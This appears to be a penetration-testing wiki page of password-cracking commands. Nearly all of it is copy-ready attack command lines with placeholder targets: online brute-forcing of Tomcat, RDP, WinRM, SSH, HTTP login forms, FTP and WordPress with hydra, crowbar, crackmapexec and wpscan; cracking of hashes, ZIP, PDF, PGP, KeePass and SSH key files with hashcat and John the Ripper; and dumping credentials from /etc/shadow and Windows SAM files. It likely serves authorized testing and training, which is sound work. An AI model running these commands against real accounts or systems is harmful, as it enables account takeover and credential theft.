Password Cracking

Wordlist

/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/others/names.txt

Bruteforce

Tomcat GET

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<Target IP Address>:8080/manager/html

RDP

crowbar -b rdp -s <Target IP Address> -u <Username> -C /usr/share/wordlists/rockyou.txt -n 1

Evil-WinRM

crackmapexec winrm <Target IP Address> -d <Domain Name> -u <Username Listt> -p <Password List>

SSH

hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ssh://<Target IP Address> -s <Port>
hydra -l <Username> -P /usr/share/wordlists/metasploit/unix_passwords.txt <Target IP Address> ssh -t 4 -V

HTTP-GET

hydra -l <Username> -P /usr/share/wordlists/rockyou.txt http-get://<Target IP Address>

HTTP-POST

hydra <Target IP Address> http-form-post <"/form/frontpage.php:user=<username>&pass=^PASS^:INVALID LOGIN"> -l <Username> -P /usr/share/wordlists/rockyou.txt -vV -f
hydra <Target IP Address> http-form-post <"/form/frontpage.php:user=^USER^&pass=^PASS^:INVALID LOGIN"> -L <Username List> -P /usr/share/wordlists/rockyou.txt -vV -f

FTP

hydra -l <Username> -P /usr/share/wordlists/rockyou.txt -vV <Target IP Address> ftp

ZIP

fcrackzip -v -u -b -D -p /usr/share/wordlists/rockyou.txt <ZIP File>

WordPress

wpscan --url <Target IP Address> -U <Username List> -P <Password List>

ASC

1

Store the hash of ASC file

gpg2john <ASC File> > hash
2

Crack the hash

john hash -w=/usr/share/wordlists/rockyou.txt
3

Import the ASC

4

Enter the passphrase from john

5

Decrypt PGP file

gpg —decrypt <PGP File>

Hash Crack

Hash Finder

hashid <Hash Value>
hash-identifier

NOTE: For the above command, paste the hash after entering that

haiti '<Hash Value>'

Hashcat

hashcat -m <Hash ID> '<Hash Value>' /usr/share/wordlists/rockyou.txt --force
hashcat 'hash' --show
hashcat -m <Hash ID> <Hash File> /usr/share/wordlists/rockyou.txt --force
hashcat <Hash File> --show

John The Ripper

  • Linux

1

Combine both shadow and password

unshadow /etc/passwd /etc/shadow > unshadowed.txt

NOTE: Grab both /etc/passwd and /etc/shadow

2

Crack the hash

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

  • Windows

john --wordlist=/usr/share/wordlists/rockyou.txt <Hash File> --format=NT
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <Hash File> --format=NT

PDF

pdf2john <PDF File> > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

ZIP

zip2john <ZIP File> > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

SAM & SYSTEM

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Keepass Database

keepass2john <KDBX File> > keepass.hash
john --wordlist=rockyou.txt keepass.hash

SSH

ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
PreviousUser CreationNextCustom Rules

Last updated